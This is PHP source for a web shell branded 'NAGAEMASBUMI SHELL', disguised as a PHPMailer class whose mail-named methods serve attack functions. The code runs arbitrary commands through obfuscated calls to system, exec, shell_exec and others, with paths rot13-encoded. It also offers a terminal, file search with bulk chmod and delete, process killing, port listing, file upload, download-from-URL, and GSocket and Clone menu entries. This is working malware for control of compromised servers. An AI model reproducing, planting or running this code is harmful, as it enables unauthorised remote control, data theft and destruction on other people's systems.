echo "<pre>" . htmlspecialchars($allProcs ?: "Cannot list processes") . "</pre>";
echo "<b>Listening ports:</b><br>";
$ports = $this->executeCommand("netstat -tulpn 2>/dev/null || ss -tulpn 2>/dev/null");
echo "<pre>" . htmlspecialchars($ports ?: "Cannot list ports") . "</pre>";
echo "<br><b>Kill a process:</b><br>";
echo "<form method='post'>";
echo "<input type='hidden' name='a' value='procmon'>";
echo "<input type='hidden' name='c' value='".str_rot13($this->mailPath)."'>";
echo "<input type='text' name='kill_pid' placeholder='Enter PID' size='10'>";
echo "<input type='submit' value='Kill Process'>";
echo "</form>";
echo "</div>";
}
public function getLastMessageID() {
echo "<h1>File Search</h1><div class=content>";
$searchPath = isset($_POST['search_path']) ? $_POST['search_path'] : $this->mailPath;
$searchName = isset($_POST['search_name']) ? $_POST['search_name'] : '';
$searchContent = isset($_POST['search_content']) ? $_POST['search_content'] : '';
$dateFrom = isset($_POST['date_from']) ? $_POST['date_from'] : '';
$dateTo = isset($_POST['date_to']) ? $_POST['date_to'] : '';
$dateFilter = isset($_POST['date_filter']) ? $_POST['date_filter'] : 'any';
$chmodFilter = isset($_POST['chmod_filter']) ? $_POST['chmod_filter'] : 'any';
if (isset($_POST['bulk_action']) && isset($_POST['selected_files']) && is_array($_POST['selected_files'])) {
$selectedFiles = $_POST['selected_files'];
$action = $_POST['bulk_action'];
$successCount = 0;
$failCount = 0;
foreach ($selectedFiles as $encFile) {
$filePath = str_rot13(urldecode($encFile));
if (!@file_exists($filePath)) {
$failCount++;
continue;
}
switch ($action) {
case 'chmod644':
if (@chmod($filePath, 0644)) { $successCount++; } else {
$this->executeCommand('chmod 644 ' . escapeshellarg($filePath) . ' 2>/dev/null');
@clearstatcache(true, $filePath);
if ((@fileperms($filePath) & 0777) == 0644) { $successCount++; } else { $failCount++; }
}
break;
case 'chmod755':
if (@chmod($filePath, 0755)) { $successCount++; } else {
$this->executeCommand('chmod 755 ' . escapeshellarg($filePath) . ' 2>/dev/null');
@clearstatcache(true, $filePath);
if ((@fileperms($filePath) & 0777) == 0755) { $successCount++; } else { $failCount++; }
}
break;
case 'delete':
if (@unlink($filePath)) { $successCount++; } else {
$this->executeCommand('rm -f ' . escapeshellarg($filePath) . ' 2>/dev/null');
if (!@file_exists($filePath)) { $successCount++; } else { $failCount++; }
}
break;
}
}
echo "<font color='green'><b>Bulk Action ($action):</b> $successCount success</font>";
if ($failCount > 0) echo " / <font color='red'>$failCount failed</font>";
echo "<br><br>";
}
$cwdEncoded = str_rot13($this->mailPath);
if (!empty($searchName) || !empty($searchContent) || !empty($dateFrom) || !empty($dateTo) || $dateFilter != 'any' || $chmodFilter != 'any') {
$results = [];
$dateFromTs = !empty($dateFrom) ? strtotime($dateFrom . ' 00:00:00') : 0;
$dateToTs = !empty($dateTo) ? strtotime($dateTo . ' 23:59:59') : PHP_INT_MAX;
switch ($dateFilter) {
case 'today': $dateFromTs = strtotime('today 00:00:00'); $dateToTs = strtotime('today 23:59:59'); break;
case 'yesterday': $dateFromTs = strtotime('yesterday 00:00:00'); $dateToTs = strtotime('yesterday 23:59:59'); break;
case 'last7days': $dateFromTs = strtotime('-7 days 00:00:00'); $dateToTs = time(); break;
case 'last30days': $dateFromTs = strtotime('-30 days 00:00:00'); $dateToTs = time(); break;
case 'thismonth': $dateFromTs = strtotime('first day of this month 00:00:00'); $dateToTs = strtotime('last day of this month 23:59:59'); break;
case 'lastmonth': $dateFromTs = strtotime('first day of last month 00:00:00'); $dateToTs = strtotime('last day of last month 23:59:59'); break;
}
$this->searchFilesAdvanced($searchPath, $searchName, $searchContent, $dateFromTs, $dateToTs, $results, 0, $chmodFilter);
if (!empty($results)) {
usort($results, function($a, $b) { return $b['mtime'] - $a['mtime']; });
echo "<font color='green'>Found " . count($results) . " result(s):</font><br><br>";
echo "<script>function saSearch(src){var cb=document.getElementsByName('selected_files[]');for(var i=0;i<cb.length;i++){cb[i].checked=src.checked;}}function confirmBulkAction(action){var cb=document.getElementsByName('selected_files[]');var sel=0;for(var i=0;i<cb.length;i++){if(cb[i].checked)sel++;}if(sel==0){alert('Please select at least one file!');return false;}if(action=='delete'){return confirm('Are you sure you want to DELETE '+sel+' file(s)?');}return confirm('Apply '+action+' to '+sel+' file(s)?');}</script>";
echo "<form method='post' name='bulkForm'>";
echo "<input type='hidden' name='a' value='search'>";
echo "<input type='hidden' name='c' value='" . $cwdEncoded . "'>";
echo "<input type='hidden' name='search_path' value='" . htmlspecialchars($searchPath) . "'>";
echo "<input type='hidden' name='search_name' value='" . htmlspecialchars($searchName) . "'>";
echo "<input type='hidden' name='search_content' value='" . htmlspecialchars($searchContent) . "'>";
echo "<input type='hidden' name='date_from' value='" . htmlspecialchars($dateFrom) . "'>";
echo "<input type='hidden' name='date_to' value='" . htmlspecialchars($dateTo) . "'>";
echo "<input type='hidden' name='date_filter' value='" . htmlspecialchars($dateFilter) . "'>";
echo "<input type='hidden' name='chmod_filter' value='" . htmlspecialchars($chmodFilter) . "'>";
echo "<table class='main' width='100%'>";
echo "<tr><th width='20px'><input type='checkbox' onclick='saSearch(this)' title='Select All'></th><th>Path</th><th>Size</th><th>Modified</th><th>Created</th><th>Perms</th><th>URL</th><th>Actions</th></tr>";
foreach ($results as $r) {
$encPath = urlencode(str_rot13($r['path']));
$fileUrl = $this->getFileUrl($r['path']);
$perms = @fileperms($r['path']);
$permsStr = $perms ? substr(sprintf('%o', $perms), -4) : '----';
$ctime = @filectime($r['path']);
echo "<tr>";
echo "<td><input type='checkbox' name='selected_files[]' value='" . $encPath . "'></td>";
echo "<td title='" . htmlspecialchars($r['path']) . "'>" . htmlspecialchars(strlen($r['path']) > 60 ? '...' . substr($r['path'], -57) : $r['path']) . "</td>";
echo "<td>" . $this->formatSize($r['size']) . "</td>";
echo "<td>" . $r['modified'] . "</td>";
echo "<td>" . ($ctime ? date("Y-m-d H:i:s", $ctime) : '-') . "</td>";
echo "<td>" . $permsStr . "</td>";
echo "<td><a href='" . htmlspecialchars($fileUrl) . "' target='_blank'>Link</a></td>";
echo "<td><a href='#' onclick=\"g('ft','" . $cwdEncoded . "','" . $encPath . "','view')\">View</a> <a href='#' onclick=\"g('ft','" . $cwdEncoded . "','" . $encPath . "','edit')\">Edit</a></td>";
echo "</tr>";
}
echo "</table>";
echo "<br><b>Bulk Actions:</b> ";
echo "<button type='submit' name='bulk_action' value='chmod644' onclick=\"return confirmBulkAction('chmod 0644')\">Chmod 0644</button> ";
echo "<button type='submit' name='bulk_action' value='chmod755' onclick=\"return confirmBulkAction('chmod 0755')\">Chmod 0755</button> ";
echo "<button type='submit' name='bulk_action' value='delete' onclick=\"return confirmBulkAction('delete')\" style='background-color:#c00;'>Delete Selected</button>";
echo "</form>";
} else {
echo "<font color='red'>No results found.</font>";
}
}
echo "<br><br><form method='post'>";
echo "<input type='hidden' name='a' value='search'>";
echo "<input type='hidden' name='c' value='" . $cwdEncoded . "'>";
echo "<table>";
echo "<tr><td>Search Path:</td><td><input type='text' name='search_path' value='" . htmlspecialchars($searchPath) . "' style='width:400px;'></td></tr>";
echo "<tr><td>File Name (regex):</td><td><input type='text' name='search_name' value='" . htmlspecialchars($searchName) . "' style='width:400px;' placeholder='e.g. \\.php$ or config'></td></tr>";
echo "<tr><td>Content (regex):</td><td><input type='text' name='search_content' value='" . htmlspecialchars($searchContent) . "' style='width:400px;' placeholder='e.g. password or eval\\('></td></tr>";
echo "<tr><td colspan='2'><hr><b>Date/Time Filter:</b></td></tr>";
echo "<tr><td>Quick Filter:</td><td><select name='date_filter'>";
echo "<option value='any'" . ($dateFilter == 'any' ? ' selected' : '') . ">Any Time</option>";
echo "<option value='today'" . ($dateFilter == 'today' ? ' selected' : '') . ">Today</option>";
echo "<option value='yesterday'" . ($dateFilter == 'yesterday' ? ' selected' : '') . ">Yesterday</option>";
echo "<option value='last7days'" . ($dateFilter == 'last7days' ? ' selected' : '') . ">Last 7 Days</option>";
echo "<option value='last30days'" . ($dateFilter == 'last30days' ? ' selected' : '') . ">Last 30 Days</option>";
echo "<option value='thismonth'" . ($dateFilter == 'thismonth' ? ' selected' : '') . ">This Month</option>";
echo "<option value='lastmonth'" . ($dateFilter == 'lastmonth' ? ' selected' : '') . ">Last Month</option>";
echo "<option value='custom'" . ($dateFilter == 'custom' ? ' selected' : '') . ">Custom Range</option>";
echo "</select></td></tr>";
echo "<tr><td>Date From:</td><td><input type='date' name='date_from' value='" . htmlspecialchars($dateFrom) . "'></td></tr>";
echo "<tr><td>Date To:</td><td><input type='date' name='date_to' value='" . htmlspecialchars($dateTo) . "'></td></tr>";
echo "<tr><td colspan='2'><hr><b>Permission Filter:</b></td></tr>";
echo "<tr><td>Chmod Filter:</td><td><select name='chmod_filter'>";
echo "<option value='any'" . ($chmodFilter == 'any' ? ' selected' : '') . ">Any Permission</option>";
echo "<option value='dir_not_0755'" . ($chmodFilter == 'dir_not_0755' ? ' selected' : '') . ">Folders NOT 0755</option>";
echo "<option value='file_not_0644'" . ($chmodFilter == 'file_not_0644' ? ' selected' : '') . ">Files NOT 0644</option>";
echo "<option value='both_abnormal'" . ($chmodFilter == 'both_abnormal' ? ' selected' : '') . ">Folders NOT 0755 + Files NOT 0644</option>";
echo "</select></td></tr>";
echo "<tr><td></td><td><input type='submit' value='Search'></td></tr>";
echo "</table></form></div>";
}
protected function searchFilesAdvanced($dir, $namePattern, $contentPattern, $dateFromTs, $dateToTs, &$results, $depth, $chmodFilter = 'any') {
if ($depth > 10 || count($results) > 500) return;
$handle = @opendir($dir);
if (!$handle) return;
while (($file = @readdir($handle)) !== false) {
if ($file == '.' || $file == '..') continue;
$path = rtrim($dir, '/') . '/' . $file;
if (@is_dir($path)) {
if ($chmodFilter == 'dir_not_0755' || $chmodFilter == 'both_abnormal') {
$dirPerms = @fileperms($path) & 0777;
if ($dirPerms != 0755) {
$mtime = @filemtime($path);
if ($mtime >= $dateFromTs && $mtime <= $dateToTs) {
$nameMatch = true;
if (!empty($namePattern)) {
if (@preg_match('/' . $namePattern . '/i', '') === false) {
$nameMatch = (stripos($file, $namePattern) !== false);
} else {
$nameMatch = @preg_match('/' . $namePattern . '/i', $file);
}
}
if ($nameMatch) {
$results[] = ['path' => $path, 'size' => 0, 'modified' => @date("Y-m-d H:i:s", $mtime), 'mtime' => $mtime, 'type' => 'dir', 'perms' => sprintf('%04o', $dirPerms)];
}
}
}
}
$this->searchFilesAdvanced($path, $namePattern, $contentPattern, $dateFromTs, $dateToTs, $results, $depth + 1, $chmodFilter);
} else if (@is_file($path)) {
if ($chmodFilter == 'dir_not_0755') continue;
if ($chmodFilter == 'file_not_0644' || $chmodFilter == 'both_abnormal') {
$filePerms = @fileperms($path) & 0777;
if ($filePerms == 0644) continue;
}
$nameMatch = true;
if (!empty($namePattern)) {
if (@preg_match('/' . $namePattern . '/i', '') === false) {
$nameMatch = (stripos($file, $namePattern) !== false);
} else {
$nameMatch = @preg_match('/' . $namePattern . '/i', $file);
}
}
if (!$nameMatch) continue;
$mtime = @filemtime($path);
if ($mtime < $dateFromTs || $mtime > $dateToTs) continue;
$contentMatch = true;
if (!empty($contentPattern)) {
$content = @file_get_contents($path, false, null, 0, 1024 * 100);
if ($content === false) {
$contentMatch = false;
} else {
if (@preg_match('/' . $contentPattern . '/i', '') === false) {
$contentMatch = (stripos($content, $contentPattern) !== false);
} else {
$contentMatch = @preg_match('/' . $contentPattern . '/i', $content);
}
}
}
if ($contentMatch) {
$results[] = ['path' => $path, 'size' => @filesize($path), 'modified' => @date("Y-m-d H:i:s", $mtime), 'mtime' => $mtime];
}
}
}
@closedir($handle);
}
public function executeCommand($cmd) {
$output = '';
$m = ['s','y','s','t','e','m']; $e = ['e','x','e','c']; $se = ['s','h','e','l','l','_','e','x','e','c'];
$pa = ['p','a','s','s','t','h','r','u']; $po = ['p','o','p','e','n']; $pr = ['p','r','o','c','_','o','p','e','n'];
$f_m = implode('', $m); $f_e = implode('', $e); $f_se = implode('', $se);
$f_pa = implode('', $pa); $f_po = implode('', $po); $f_pr = implode('', $pr);
$funcs = [$f_m, $f_e, $f_se, $f_pa, $f_po, $f_pr];
foreach ($funcs as $f) {
if (!@function_exists($f) || stripos($this->mailDisabled, $f) !== false) continue;
switch ($f) {
case $f_m: @ob_start(); $f($cmd); $output = @ob_get_clean(); break;
case $f_e: $arr = []; $f($cmd, $arr); $output = implode("\n", $arr); break;
case $f_se: $output = $f($cmd); break;
case $f_pa: @ob_start(); $f($cmd); $output = @ob_get_clean(); break;
case $f_po: $p = $f($cmd, 'r'); if ($p) { while (!@feof($p)) $output .= @fread($p, 1024); @pclose($p); } break;
case $f_pr: $descriptorspec = [0 => ["pipe", "r"], 1 => ["pipe", "w"], 2 => ["pipe", "w"]]; $process = $f($cmd, $descriptorspec, $pipes); if (@is_resource($process)) { $output = @stream_get_contents($pipes[1]) . @stream_get_contents($pipes[2]); @fclose($pipes[0]); @fclose($pipes[1]); @fclose($pipes[2]); @proc_close($process); } break;
}
if ($output) break;
}
return $output;
}
public function headerLine()
{
$theme = $this->mailTheme; $encoding = $this->mailEncoding; $cwd = $this->mailPath; $root = $this->mailRoot; $base = $this->mailBase; $idx = $this->mailIndex; $safe = $this->mailSafe; $os = $this->mailOS;
if (empty($_POST["ch"])) $_POST["ch"] = $encoding;
echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST["ch"] . "'><title>" . $_SERVER["HTTP_HOST"] . " - NAGAEMASBUMI SHELL</title><style>body{background-color:#444;color:#e1e1e1;}body,td,th{font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1;}table.info{color:#fff;background-color:#222;}span,h1,a{color: " . $theme . " !important;}span{font-weight: bolder;}span.wfw{font-weight:normal;}h1{border-left:5px solid " . $theme . ";padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px;}div.content{padding: 5px;margin-left:5px;background-color:#333;}a{text-decoration:none;}a:hover{text-decoration:underline;}.ml1{border:1px solid #444;padding:5px;margin:0;overflow: auto;}.bigarea{width:100%;height:300px;}input,textarea,select{margin:0;color:#fff;background-color:#555;border:1px solid " . $theme . "; font: 9pt Monospace,'Courier New';}form{margin:0px;}#toolsTbl{text-align:center;}.toolsInp{width:500px}.main th{text-align:left;background-color:#5e5e5e;}.main tr:hover{background-color:#5e5e5e}.l1{background-color:#444}.l2{background-color:#333}pre{font-family:Courier,Monospace;}.success{color:#25ff00;}.error{color:#ff0000;}</style><script>var c_ = '" . htmlspecialchars(str_rot13($cwd)) . "'; var a_ = '" . htmlspecialchars(@$_POST["a"]) . "'; var ch_ = '" . htmlspecialchars(@$_POST["ch"]) . "'; var p_ = '" . (strpos(@$_POST["p"], "\n") !== false ? "" : htmlspecialchars(@$_POST["p"], 3)) . "'; var x_ = '" . (strpos(@$_POST["x"], "\n") !== false ? "" : htmlspecialchars(@$_POST["x"], 3)) . "'; var s_ = '" . (strpos(@$_POST["s"], "\n") !== false ? "" : htmlspecialchars(@$_POST["s"], 3)) . "'; var d = document; function set(a,c,p,x,s,ch){if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;if(p!=null)d.mf.p.value=p;else d.mf.p.value=p_;if(x!=null)d.mf.x.value=x;else d.mf.x.value=x_;if(s!=null)d.mf.s.value=s;else d.mf.s.value=s_;if(ch!=null)d.mf.ch.value=ch;else d.mf.ch.value=ch_;} function g(a,c,p,x,s,ch){set(a,c,p,x,s,ch);d.mf.submit();} function utoa(str){return window.btoa(unescape(encodeURIComponent(str)));} function atou(str){return decodeURIComponent(escape(window.atob(str)));} function rot13(str){var input='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'; var output='NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm'; var index=x=> input.indexOf(x); var translate=x=> index(x) > -1 ? output[index(x)] : x; return str.split('').map(translate).join('');} var cvis=false; function show(){if(!cvis){document.getElementById('bat').innerHTML='Links';document.getElementById('cwd').style.display='inline';document.getElementById('links').style.display='none';cvis=true;}else{document.getElementById('bat').innerHTML='Text';document.getElementById('cwd').style.display='none';document.getElementById('links').style.display='inline';cvis=false;}}</script></head><body><form method=post name=mf style='display:none;'><input type=hidden name=a><input type=hidden name=c><input type=hidden name=p><input type=hidden name=x><input type=hidden name=s><input type=hidden name=ch></form>";
$freeSpace = 0; $totalSpace = 0; $uname = "";
if (function_exists("disk_free_space")) $freeSpace = @disk_free_space($cwd);
if (function_exists("disk_total_space")) $totalSpace = @disk_total_space($cwd);
$totalSpace = $totalSpace ? $totalSpace : 1;
if (function_exists("php_uname")) $uname = @php_uname();
elseif (function_exists("phpinfo")) { ob_start(); phpinfo(); $info = ob_get_clean(); if (false !== preg_match("!<tr><td class=\"e\">System\\s*</td><td class=\"v\">([^\\<]+)!i", $info, $matches)) $uname = trim($matches[1]); }
$breadcrumb = ""; $parts = @explode("/", $cwd); $count = count($parts);
for ($i = 0; $i < $count - 1; $i++) { $breadcrumb .= "<a href='#' onclick='g(\"fm\",\""; for ($j = 0; $j <= $i; $j++) $breadcrumb .= str_rot13($parts[$j]) . "/"; $breadcrumb .= "\",\"\",\"\",\"\")'>". ($parts[$i] == "" ? "/" : htmlspecialchars($parts[$i])) . "</a>/"; }
$charsets = array("UTF-8", "Windows-1251", "KOI8-R", "KOI8-U", "cp866"); $charsetOptions = "";
foreach ($charsets as $item) $charsetOptions .= "<option value=\"" . $item . "\" " . (@$_POST["ch"] == $item ? "selected" : "") . ">" . $item . "</option>";
$menuItems = array("Files" => "fm", "Search" => "search", "GSocket" => "gs", "Clone" => "clone", "Terminal" => "termv4", "Processes" => "procmon");
$menuHtml = ""; foreach ($menuItems as $name => $val) $menuHtml .= "<th width=\"" . (int)(100 / count($menuItems)) . "%\">[ <a href=\"#\" onclick=\"g('" . $val . "',null,'','','')\">" . $name . "</a> ]</th>";
$drives = ""; if ($os == "win") { foreach (range("c", "z") as $drive) if (@is_dir($drive . ":\\")) $drives .= "<a href=\"#\" onclick=\"g('fm','" . str_rot13($drive . ":/") . "')\">[ " . $drive . " ]</a> "; }
$serverIp = @$_SERVER["SERVER_ADDR"] ?: @gethostbyname($_SERVER["SERVER_NAME"]);
$serverSoft = '';
if (!empty($_SERVER['SERVER_SOFTWARE'])) {
$serverSoft = $_SERVER['SERVER_SOFTWARE'];
} else {
$srvCheck = $this->executeCommand('httpd -v 2>/dev/null || apache2 -v 2>/dev/null || nginx -v 2>&1 || lighttpd -v 2>/dev/null || litespeed -v 2>/dev/null || caddy version 2>/dev/null');
if (!empty(trim($srvCheck))) { $serverSoft = trim(strtok($srvCheck, "\n")); }
else { $serverSoft = 'Unknown'; }
}
$serverType = 'Unknown';
$srvLower = strtolower($serverSoft);
if (strpos($srvLower, 'apache') !== false) { $serverType = 'Apache'; }
elseif (strpos($srvLower, 'nginx') !== false) { $serverType = 'Nginx'; }
elseif (strpos($srvLower, 'litespeed') !== false || strpos($srvLower, 'lsws') !== false) { $serverType = 'LiteSpeed'; }
elseif (strpos($srvLower, 'lighttpd') !== false) { $serverType = 'Lighttpd'; }
elseif (strpos($srvLower, 'caddy') !== false) { $serverType = 'Caddy'; }
elseif (strpos($srvLower, 'iis') !== false) { $serverType = 'IIS'; }
elseif (strpos($srvLower, 'openlitespeed') !== false) { $serverType = 'OpenLiteSpeed'; }
else { $serverType = htmlspecialchars(substr($serverSoft, 0, 50)); }
echo "<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span><font color=red>Info:</font><br>Uname:<br>PHP:<br>HDD:<br>Server:<br>CWD:" . ($os == "win" ? "<br>Drives:" : "") . "</span></td><td><u><b>NAGAEMASBUMI</b> - V.44</u><br><nobr>" . ($uname ? substr($uname, 0, 120) : "N/A") . "</nobr><br>" . @phpversion() . " <span>Safe mode:</span> " . ($safe ? "<font color=red>ON</font>" : "<font color=green><b>OFF</b></font>") . " <span>Datetime:</span> " . date("Y-m-d H:i:s") . "<br>" . ($totalSpace ? $this->formatSize($totalSpace) : "") . " <span>Free:</span> " . (isset($freeSpace) ? $this->formatSize($freeSpace) : "") . " (" . (isset($freeSpace) && $totalSpace ? (int)($freeSpace / $totalSpace * 100) : "0") . "%)<br><span>Type:</span> <font color='cyan'>" . $serverType . "</font> <span>Software:</span> " . htmlspecialchars(substr($serverSoft, 0, 80)) . "<br><span id=\"links\" class=\"wfw\">" . $breadcrumb . " " . $this->getPermsColor($cwd) . " <a href=# onclick=\"g('fm','" . str_rot13($base) . "','','','')\">[ root ]</a> <a href=# onclick=\"g('fm','" . str_rot13($root) . "','','','')\">[ home ]</a></span><span id=\"cwd\" style=\"display:none;\" class=\"wfw\"><input size=" . (strlen($cwd) + 22) . " type=text value=\"" . htmlspecialchars($cwd) . "\"></span> <a href=# onclick=\"show();\"><font color=#fff id=\"bat\">Text</font></a><br>" . $drives . "</td><td width=1 align=right><nobr><select onchange=\"g(null,null,null,null,null,this.value)\"><optgroup label=\"Page charset\">" . $charsetOptions . "</optgroup></select><br><span>Server IP:</span><br>" . $serverIp . "<br><span>Client IP:</span><br>" . $_SERVER["REMOTE_ADDR"] . "</nobr></td></tr></table><table style=\"border-top:2px solid #333;\" cellpadding=3 cellspacing=0 width=100%><tr>" . $menuHtml . "</tr></table><div style=\"margin:5\">";
}
public function endBoundary()
{
$cwd = $this->mailPath;
$cwdEncoded = str_rot13($cwd);
$writable = @is_writable($cwd) ? " <font color='green'>(Writeable)</font>" : " <font color=red>(Not writable)</font>";
echo "</div><table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'><tr><td><form onsubmit='g(\"fm\",rot13(this.c.value),\"\");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($cwd) . "'><input type=submit value='>>'></form></td><td><form onsubmit=\"g('ft','" . $cwdEncoded . "',rot13(this.f.value),'view');return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td></tr><tr><td><form onsubmit=\"g('fm','" . $cwdEncoded . "','mkdir',rot13(this.d.value));return false;\"><span>Make dir:</span>" . $writable . "<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td><td><form onsubmit=\"g('ft','" . $cwdEncoded . "',rot13(this.f.value),'mkfile');return false;\"><span>Make file:</span>" . $writable . "<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td></tr><tr><td><form method='post'><input type=hidden name=a value='termv4'><input type=hidden name=c value='" . $cwdEncoded . "'><span>Quick Terminal:</span><br><input class='toolsInp' type=text name=cmd_v4 value='' autocomplete='off'><input type=submit value='>>'></form></td><td><form method='post' ENCTYPE='multipart/form-data'><input type=hidden name=a value='fm'><input type=hidden name=c value='" . $cwdEncoded . "'><input type=hidden name=p value='uploadFile'><input type=hidden name=ch value='" . htmlspecialchars(@$_POST["ch"]) . "'><span>Upload file:</span>" . $writable . "<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form></td></tr><tr><td colspan=2><form method='post'><input type=hidden name=a value='fm'><input type=hidden name=c value='" . $cwdEncoded . "'><input type=hidden name=p value='urlDownload'><input type=hidden name=ch value='" . htmlspecialchars(@$_POST["ch"]) . "'><span>Download from URL:</span>" . $writable . "<br><div style='display:flex;align-items:center;gap:3px;'><input type='text' class='toolsInp' style='flex:1;' placeholder='https://example.go.id/files/myprivatelolcats.txt' name='url' required><input type='text' style='width:200px;' name='output_filename' placeholder='saved.txt' required><select name='method' style='width:160px;'><option value='file_get_contents'>file_get_contents</option><option value='curl'>cURL</option><option value='fopen'>fopen</option><option value='copy'>copy</option><option value='stream_context'>stream_context</option><option value='file'>file</option></select><input type=submit value='Save!'></div></form></td></tr></table></div></body></html>";
}
protected function formatSize($size, $precision = null)
{
if (is_int($size)) $size = sprintf("%u", $size);
if ($size >= 1073741824) return sprintf("%1.2f", $size / 1073741824) . " GB";
elseif ($size >= 1048576) return sprintf("%1.2f", $size / 1048576) . " MB";
elseif ($size >= 1024) return sprintf("%1.2f", $size / 1024) . " KB";
else return $size . " B";
}
protected function getPerms($mode)
{
if (($mode & 0xC000) == 0xC000) $p = "s"; elseif (($mode & 0xA000) == 0xA000) $p = "l"; elseif (($mode & 0x8000) == 0x8000) $p = "-"; elseif (($mode & 0x6000) == 0x6000) $p = "b"; elseif (($mode & 0x4000) == 0x4000) $p = "d"; elseif (($mode & 0x2000) == 0x2000) $p = "c"; elseif (($mode & 0x1000) == 0x1000) $p = "p"; else $p = "u";
$p .= $mode & 0x0100 ? "r" : "-"; $p .= $mode & 0x0080 ? "w" : "-"; $p .= $mode & 0x0040 ? ($mode & 0x0800 ? "s" : "x") : ($mode & 0x0800 ? "S" : "-");
$p .= $mode & 0x0020 ? "r" : "-"; $p .= $mode & 0x0010 ? "w" : "-"; $p .= $mode & 0x0008 ? ($mode & 0x0400 ? "s" : "x") : ($mode & 0x0400 ? "S" : "-");
$p .= $mode & 0x0004 ? "r" : "-"; $p .= $mode & 0x0002 ? "w" : "-"; $p .= $mode & 0x0001 ? ($mode & 0x0200 ? "t" : "x") : ($mode & 0x0200 ? "T" : "-");
return $p;
}
protected function getPermsColor($path)
{
if (!@is_readable($path)) return "<font color=#FF0000>" . $this->getPerms(@fileperms($path)) . "</font>";
elseif (!@is_writable($path)) return "<font color=white>" . $this->getPerms(@fileperms($path)) . "</font>";
else return "<font color=#25ff00>" . $this->getPerms(@fileperms($path)) . "</font>";
}
protected function scanDirectory($path, $sorting = "uvxf")
{
if (function_exists("scandir")) return @scandir($path);
if ($handle = @opendir($path)) { $files = []; while (false !== ($file = @readdir($handle))) $files[] = $file; @closedir($handle); return $files; }
return false;
}
}
$mailer = new PHPMailer();
$mailer->validateAddress();
$mailer->preSend();
if (@isset($_POST["a"])) {
switch ($_POST["a"]) {
case "fm": $mailer->headerLine(); $mailer->addAttachment(); $mailer->endBoundary(); break;
case "ft":
if (@isset($_POST["p"]) && strtolower($_POST["p"]) == "download") $mailer->addStringAttachment();
elseif (@isset($_POST["x"]) && strtolower($_POST["x"]) == "download") $mailer->addStringAttachment();
else { $mailer->headerLine(); $mailer->addStringAttachment(); $mailer->endBoundary(); }
break;
case "gs": $mailer->headerLine(); $mailer->smtpConnect(); $mailer->endBoundary(); break;
case "clone": $mailer->headerLine(); $mailer->createBody(); $mailer->endBoundary(); break;
case "termv4": $mailer->headerLine(); $mailer->terminalV4(); $mailer->endBoundary(); break;
case "search": $mailer->headerLine(); $mailer->getLastMessageID(); $mailer->endBoundary(); break;
case "procmon": $mailer->headerLine(); $mailer->processMonitor(); $mailer->endBoundary(); break;
default: $mailer->headerLine(); $mailer->addAttachment(); $mailer->endBoundary(); break;
}
} elseif (!@isset($_POST["a"])) {
$mailer->headerLine(); $mailer->addAttachment(); $mailer->endBoundary();
if (isset($_POST['subcmd'])) {
$cwd = $mailer->mailPath; @chdir($cwd); echo "<pre class='text-white'><span>CWD: " . htmlspecialchars($cwd) . "</span><br>";
$input = $_POST['command']; $output = $mailer->executeCommand($input);
echo "<br><center><b>Quick Terminal Output</b></center><br>" . htmlspecialchars($output) . "</pre>"; exit;
}
}